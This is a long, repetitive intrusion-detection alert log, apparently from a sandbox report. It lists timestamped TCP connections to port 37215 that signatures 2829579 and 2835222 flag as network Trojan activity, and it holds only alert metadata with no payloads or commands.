                Timestamp:05/29/24-15:15:14.282214
                SID:2829579
                Source Port:54258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320964
                SID:2829579
                Source Port:46286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438290
                SID:2829579
                Source Port:33776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238947
                SID:2829579
                Source Port:55334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652192
                SID:2835222
                Source Port:41424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087283
                SID:2835222
                Source Port:60038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770825
                SID:2835222
                Source Port:36540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986860
                SID:2835222
                Source Port:37032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463413
                SID:2835222
                Source Port:37542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369984
                SID:2829579
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169053
                SID:2835222
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876336
                SID:2835222
                Source Port:56102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784911
                SID:2829579
                Source Port:58924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968503
                SID:2835222
                Source Port:48086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419705
                SID:2835222
                Source Port:49000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859406
                SID:2835222
                Source Port:33786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819131
                SID:2835222
                Source Port:47586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010748
                SID:2829579
                Source Port:42840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.627038
                SID:2829579
                Source Port:58572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870516
                SID:2835222
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782217
                SID:2835222
                Source Port:45196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786239
                SID:2829579
                Source Port:54764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444268
                SID:2835222
                Source Port:57204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037114
                SID:2835222
                Source Port:57358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421536
                SID:2835222
                Source Port:34976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656065
                SID:2829579
                Source Port:58634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617727
                SID:2835222
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066415
                SID:2829579
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436529
                SID:2829579
                Source Port:37038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277555
                SID:2829579
                Source Port:46870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840152
                SID:2835222
                Source Port:44466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519731
                SID:2835222
                Source Port:47888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160887
                SID:2835222
                Source Port:55038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135842
                SID:2835222
                Source Port:46984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798011
                SID:2829579
                Source Port:57412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776495
                SID:2829579
                Source Port:44544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799675
                SID:2835222
                Source Port:59596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785944
                SID:2829579
                Source Port:34690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559862
                SID:2829579
                Source Port:48538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420108
                SID:2829579
                Source Port:40492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956276
                SID:2835222
                Source Port:55026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725442
                SID:2829579
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574000
                SID:2829579
                Source Port:54920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617943
                SID:2835222
                Source Port:39128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024698
                SID:2829579
                Source Port:38458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421397
                SID:2835222
                Source Port:51844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110837
                SID:2829579
                Source Port:52908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.226701
                SID:2835222
                Source Port:59806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222832
                SID:2829579
                Source Port:58634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223287
                SID:2835222
                Source Port:41002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586313
                SID:2835222
                Source Port:38504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421987
                SID:2835222
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444317
                SID:2835222
                Source Port:60340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981317
                SID:2829579
                Source Port:36118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900530
                SID:2829579
                Source Port:58928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320896
                SID:2835222
                Source Port:53942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420336
                SID:2829579
                Source Port:34902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859394
                SID:2829579
                Source Port:42144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267554
                SID:2835222
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500647
                SID:2829579
                Source Port:54822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722750
                SID:2829579
                Source Port:35514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644891
                SID:2835222
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813025
                SID:2835222
                Source Port:34788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555878
                SID:2829579
                Source Port:38904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957741
                SID:2829579
                Source Port:35382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141901
                SID:2835222
                Source Port:44530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321190
                SID:2829579
                Source Port:38008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663911
                SID:2835222
                Source Port:52690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.935027
                SID:2835222
                Source Port:53948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884007
                SID:2835222
                Source Port:58500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586638
                SID:2835222
                Source Port:41452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586827
                SID:2835222
                Source Port:51106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655751
                SID:2835222
                Source Port:58012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914659
                SID:2829579
                Source Port:41964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993090
                SID:2829579
                Source Port:46536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899239
                SID:2835222
                Source Port:59326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782578
                SID:2829579
                Source Port:59740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548717
                SID:2829579
                Source Port:42762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155534
                SID:2829579
                Source Port:36104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551378
                SID:2835222
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023380
                SID:2835222
                Source Port:56580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844538
                SID:2829579
                Source Port:54670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532347
                SID:2835222
                Source Port:44008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928373
                SID:2829579
                Source Port:46660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858818
                SID:2835222
                Source Port:48844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660491
                SID:2829579
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659819
                SID:2835222
                Source Port:47064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584186
                SID:2829579
                Source Port:44366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209757
                SID:2835222
                Source Port:42850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534168
                SID:2835222
                Source Port:37886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165934
                SID:2835222
                Source Port:53636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583790
                SID:2835222
                Source Port:44050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985429
                SID:2835222
                Source Port:33954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315720
                SID:2829579
                Source Port:42400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375195
                SID:2835222
                Source Port:41418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807408
                SID:2835222
                Source Port:40990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870281
                SID:2829579
                Source Port:32844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731774
                SID:2829579
                Source Port:35484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.656073
                SID:2835222
                Source Port:50182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839034
                SID:2829579
                Source Port:35216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665171
                SID:2835222
                Source Port:34860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422046
                SID:2835222
                Source Port:52224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738444
                SID:2835222
                Source Port:51982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652205
                SID:2829579
                Source Port:46476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.726667
                SID:2835222
                Source Port:38270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643915
                SID:2835222
                Source Port:55270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223374
                SID:2829579
                Source Port:60126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721047
                SID:2835222
                Source Port:52978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155620
                SID:2829579
                Source Port:50360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732172
                SID:2829579
                Source Port:34498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801370
                SID:2835222
                Source Port:44176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.604264
                SID:2835222
                Source Port:51866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263912
                SID:2835222
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042501
                SID:2835222
                Source Port:50874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498147
                SID:2835222
                Source Port:56738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944171
                SID:2829579
                Source Port:56590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155602
                SID:2829579
                Source Port:42624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873173
                SID:2829579
                Source Port:57138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288365
                SID:2835222
                Source Port:51966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276917
                SID:2829579
                Source Port:53228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135397
                SID:2835222
                Source Port:38200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378859
                SID:2829579
                Source Port:59826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224755
                SID:2835222
                Source Port:52238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716523
                SID:2835222
                Source Port:49940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332514
                SID:2835222
                Source Port:35944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737701
                SID:2829579
                Source Port:59986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630317
                SID:2829579
                Source Port:34680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369813
                SID:2829579
                Source Port:56836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332812
                SID:2829579
                Source Port:59822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507383
                SID:2835222
                Source Port:41248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155687
                SID:2829579
                Source Port:58642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993910
                SID:2829579
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659228
                SID:2829579
                Source Port:35130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572092
                SID:2835222
                Source Port:42890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520380
                SID:2835222
                Source Port:42256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437806
                SID:2835222
                Source Port:50868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943298
                SID:2829579
                Source Port:53260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901346
                SID:2829579
                Source Port:44828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362432
                SID:2829579
                Source Port:55420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928251
                SID:2829579
                Source Port:56704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282255
                SID:2829579
                Source Port:58500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702430
                SID:2835222
                Source Port:59142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687103
                SID:2829579
                Source Port:46658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970303
                SID:2835222
                Source Port:36938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559695
                SID:2835222
                Source Port:32996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032727
                SID:2829579
                Source Port:57822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418777
                SID:2829579
                Source Port:48028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072198
                SID:2835222
                Source Port:56492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177083
                SID:2829579
                Source Port:34486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369196
                SID:2829579
                Source Port:38192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.277614
                SID:2835222
                Source Port:39602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.715877
                SID:2829579
                Source Port:37666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808673
                SID:2829579
                Source Port:33450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136026
                SID:2829579
                Source Port:40346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902143
                SID:2835222
                Source Port:43512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830742
                SID:2829579
                Source Port:51496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898410
                SID:2835222
                Source Port:39876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945766
                SID:2835222
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985392
                SID:2829579
                Source Port:47606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026610
                SID:2829579
                Source Port:34198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209443
                SID:2835222
                Source Port:57682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948468
                SID:2829579
                Source Port:45540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670432
                SID:2835222
                Source Port:53828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075139
                SID:2829579
                Source Port:45958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216816
                SID:2835222
                Source Port:59558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660377
                SID:2835222
                Source Port:35380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384301
                SID:2829579
                Source Port:45608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019990
                SID:2835222
                Source Port:49998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.607430
                SID:2829579
                Source Port:51462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783143
                SID:2835222
                Source Port:51262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325555
                SID:2835222
                Source Port:53934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654763
                SID:2829579
                Source Port:55856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134751
                SID:2829579
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292315
                SID:2829579
                Source Port:47498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564899
                SID:2835222
                Source Port:47218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227912
                SID:2835222
                Source Port:53628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854454
                SID:2829579
                Source Port:53588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887934
                SID:2829579
                Source Port:41956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564822
                SID:2829579
                Source Port:51418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767442
                SID:2829579
                Source Port:54144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447443
                SID:2835222
                Source Port:47084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.116475
                SID:2835222
                Source Port:59236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810786
                SID:2835222
                Source Port:52142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617383
                SID:2835222
                Source Port:33420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790747
                SID:2835222
                Source Port:35440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655290
                SID:2835222
                Source Port:55432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843511
                SID:2829579
                Source Port:36600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836661
                SID:2835222
                Source Port:35836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.159816
                SID:2835222
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881160
                SID:2835222
                Source Port:34964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.974912
                SID:2829579
                Source Port:36070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611981
                SID:2835222
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173182
                SID:2829579
                Source Port:46544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811667
                SID:2835222
                Source Port:60952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744767
                SID:2829579
                Source Port:59586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899602
                SID:2835222
                Source Port:35298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.041889
                SID:2835222
                Source Port:53928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.934842
